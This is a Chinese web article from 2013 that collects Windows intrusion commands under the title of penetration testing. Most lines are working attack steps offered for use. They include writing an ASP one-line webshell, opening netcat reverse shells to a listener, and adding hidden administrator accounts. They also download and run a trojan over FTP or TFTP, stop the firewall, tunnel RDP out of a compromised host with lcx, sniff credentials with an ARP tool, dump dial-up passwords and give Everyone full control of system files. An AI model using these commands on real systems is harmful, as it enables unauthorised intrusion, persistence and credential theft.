windows下面常用的渗透测试命令

2013 年 1 月 3 日3570

  【IT168技术】echo ^<%eval request(“#”)%^> >C:\wmpub\hkfe666\h4ck.asp

  Md hack 创建hack文件夹

  本地nc -vv -p -l 端口

  服务器 nc路径 -e cmd路径 ip 端口

  Rd hack 删除hack文件夹

  Type d:\wwwroot\hack.asp 查看一句话木马的内容

  Del d:\wwwroot\hack.asp 删除hack.asp

  Dir c:\ 查看c盘根目录全部文件夹和文件信息

  Tree e:\ 显示e盘文件目录树

  reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v portnumber

  查看终端确定为3389?

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server 看看fDenyTSConnections的键值是多少?值为0是开,为1是关

  netstat -ano 能看到3389开启?

  net stop policyagent

  net stop sharedaccess

  /c dir d:\freehost\weiquanguang\cnhonker*.* /w/o/s

  先net stop sharedacess关闭防火,再net stop PolicyAgent关闭筛选

  administrator默认被允许,这种情况下,你需将用户同时加入“Remote Desktop Users”组。

  net user xxx pppp /add &net localgroup administrators xxx /add

  net localgroup administrators xxx /add

  net localgroup “Remote Desktop Users” xxx /add 远程桌面用户允许设置。

  gpedit.msc

  常用系统小命令

  gpedit.msc计算机组策略

  compmgmt.msc计算机管理

  devmgmt.msc设备管理

  diskmgmt.msc磁盘管理

  fsmgmt.msc共享管理

  lusrmgr.ms本地用户管理

  notepad写字板write

  services.msc服务管理

  开启 telnet

  @echo off

  sc config tlntsvr start= auto

  net start telnet

  在CMD模式下结束某一进程

  一: 通过tasklist 可以查找到相关进程的PID.

  语法:tasklist /svc 通过taskkill pid 可以关掉进程。 语法: taskkill /im 进程名 /f

  二: ntsd -c q -p PID 可以强行结束运行进程

  zxarps.exe -idx 0 -ip 目标的IP -port 80,21,3389 -logfilter “+post,+user,+pass”

  dialupass /allusers /stext “c:\1.txt”

  ========================================================

  query user 查询登陆用户

  logoff ID  蹬出某用户

  net user 查看所有用户

  c:\xp3389.exe -a

  net user 1 1 /add

  net1 localgroup administrators 1 /add

  C:\>net1 user guest /active:yes 启用该用户

  =========================================================

  whoami 查看全系统权限

  调系统权限

  C:\>c:\windows\system32\cacls.exe c:\windows\system32\net.exe /t /e /g everyone:f

  ==========================================================

  FTP命令行下加账号的命令;很爽……

  C:\>ftp

  ftp> open 192.168.0.22

  ftp> quote site exec net.exe user admin$ jinwei58 /add

  ftp> quote site exec net.exe localgroup admin$ /add

  200 EXEC command successful (TID=33)。

  ============================================================

  ftp传马命令

  echo open 自己的FTP > cmd.txt

  echo 帐户>> cmd.txt

  echo 密码>> cmd.txt

  echo binary >> cmd.txt

  echo get 木马。exe >> cmd.txt

  echo bye >> cmd.txt

  ftp -s:cmd.txt

  木马。exe

  木马。exe

  del cmd.txt. /q

  ==============================================================

  quote site exec net user 用户名 密码 /add 添加用户

  quote site exec net localgroup administrators 用户名 /add

  tasklist \svc //shell列进程

  ==============================================================

  sql语句加管理用户

  Select MyCmd(“net user”);

  select state(“net user”)

  select cmdshell(“net user”)

  ==============================================================

  netstat -an

  1.查询终端开放端口

  netstat -an | find “3389″

  ================================================================

  查询终端3389端口

  REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ ”Server\WinStations\RDP-Tcp /v PortNumber

  ================================================================

  2.开启2003终端

  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ ”Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

  ================================================================

  3.更改终端端口为2008(0x7d8)

  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ ”Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f

  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ ”Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f

  =================================================================

  4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制

  REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

  =================================================================

  5.开启Win2000的终端 (需重启)

  先将开启终端的工具上传到目标主机的c:\

  然后执行c:\ver3389.exe等待系统重启就可以了

  =====================================================================

  6.解决终端超出了最大连接数的命令

  mstsc /v:ip:3389 /console

  =====================================================================

  关闭防火墙

  net stop sharedaccess

  ======================================================================

  先将双开3389的工具上传到目标主机下的c:\

  然后运行命令 c:\3389.exe

  ======================================================================

  Tasklist/SVC >>c:\3389.txt

  =====================================================================

  查看adsl

  Dialupass.exe /allusers /stext “c:\1.txt”

  =====================================================================

  端口映射篇之lcx使用方法

  Lcx 命令

  本机运行lcx.exe -listen 3001 3002

  c:\lcx.exe -slave 61.184.188.125 3001 肉鸡的内网IP 3389

  C:\recycler\lcx.exe -slave 121.61.225.211 3001 192.170.0.23 3389

  在本机连接: 127.0.0.1:3002

  =====================================================================

  这里是nc的命令说明:

  2.nc反弹提权:

  服务器执行: nc位置 -l -p 8080 -t -e cmd位置

  监听本地入栈信息

  NC地址 cmd地址

  ————————————————— -p port 打开本地端口

  本地执行: telnet + 服务器IP地址 + 446

  ————————————————— -t 以telnet形式应答入栈请求

  传马命令: tftp -i ip地址 get 木马名字。exe -e 程序重定向

  额外:传个NC到Webshell上去,反弹个shell,然后用htran转发端口数据,接着在本地嗅探。

  2.降低运行权限

  ////////////////////////////

  现在本地监听一个端口。

  nc -vv -l -p 8080

  最好是80或8080这样的端口,被防火墙拦截的几率小很多。

  在WebShell运行下面命令连接我们监听的端口得到CmdShell:

  nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe

  —-===============================================================

  1.查询终端端口

  xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ ”Server\WinStations\RDP-Tcp /v PortNumber

  通用:regedit /e tsp.reg “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp”

  type tsp.reg

  2.开启XP&2003终端服务

  HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber\

  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ ”Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

  3.更改终端端口为20008(0x4E28)

  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ ”Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ ”Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

  4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制

  REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 40404:TCP /t REG_SZ /d 40404:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

  5.开启Win2000的终端,端口为3389(需重启)

  echo Windows Registry Editor Version 5.00 >2000.reg

  echo. >>2000.reg

  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg

  echo “Enabled”=“0″ >>2000.reg

  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg

  echo “ShutdownWithoutLogon”=“0″ >>2000.reg

  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg

  echo “EnableAdminTSRemote”=dword:00000001 >>2000.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg

  echo “TSEnabled”=dword:00000001 >>2000.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg

  echo “Start”=dword:00000002 >>2000.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg

  echo “Start”=dword:00000002 >>2000.reg

  echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg

  echo “Hotkey”=“1″ >>2000.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg

  echo “PortNumber”=dword:00000D3D >>2000.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg

  echo “PortNumber”=dword:00000D3D >>2000.reg

  6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)

  @ECHO OFF & cd/d %temp% & echo [version] > restart.inf

  (set inf=InstallHinfSection DefaultInstall)

  echo signature=$chicago$ >> restart.inf

  echo [defaultinstall] >> restart.inf

  rundll32 setupapi,%inf% 1 %temp%\restart.inf

  7.禁用TCP/IP端口筛选 (需重启)

  REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

  8.终端超出最大连接数时可用下面的命令来连接

  mstsc /v:ip:3389 /console

  9.调整NTFS分区权限

  cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)

  cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)

0 0